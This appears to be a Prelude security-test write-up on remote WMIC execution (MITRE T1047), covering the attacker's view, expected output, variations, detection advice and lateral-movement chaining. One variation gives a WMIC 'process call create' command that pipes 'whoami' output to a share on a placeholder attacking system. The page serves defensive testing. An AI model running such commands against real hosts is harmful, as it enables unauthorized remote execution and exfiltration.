
# Test remote WMIC access

---

#### Metadata

- *Prelude ID*: 661efd66-d876-41de-88ee-ba9ec4328154
- *MITRE Technique ID*: [T1047](https://attack.mitre.org/techniques/T1047/)

---

### A hacker's perspective

---

Windows Management Interface Command (WMIC) is a powerful "live-off-the-land" binary for interacting with WMI. Knowing that I am able to execute WMI commands against remote systems tells me several things about my current permissions and how the target host is configured. I know, first of all, that my user has requisite privileges to execute commands remotely, which can allow me to move laterally in a number of ways. Secondly, I can make the assumption that remote hosts are Distributed Component Object Model (DCOM) accessible, which lets me know I have a possible execution mechanism on that host. 

### Expected output

---

Short response indicated a (Win32_Process)->Create() was successful on the remote system with a return value of 0. 

### Basic variations

---

This command can easily be modified for both local and remote discovery. With WMIC, we could also query other WMI classes like Win32_ComputerSystem or Win32_Share to discover more about the system. It is also possible to execute more intricate commands to get a response by using a technique like 'process call create "cmd.exe /c whoami >> \\<ATTACKING SYSTEM>\<PUBLIC SHARE>\cmd_response.txt"'. 

### Prevent + Detect

---

Capturing PowerShell and command-line input would allow defenders to see calls to the WMIC binary, which might be suspicious depending upon the environment. Additionally, consider disabling DCOM access so that WMIC cannot be used to execute code through DCOM remotely. The Windows firewall will block DCOM access by default as well, so review domain Group Policy Objects (GPOs) to ensure that Windows firewall is enabled and configured to block inbound DCOM. 

### How it is chained

---

An attacker that is testing their ability to execute commands/process on remote systems is almost certainly looking to move laterally to a new target. Likely next steps would be staging tools on the remote system (T1570) via SMB or another innocous protocol, then executing the staged payload with WMIC over DCOM (T1021.003) or WinRM (T1021.006). 
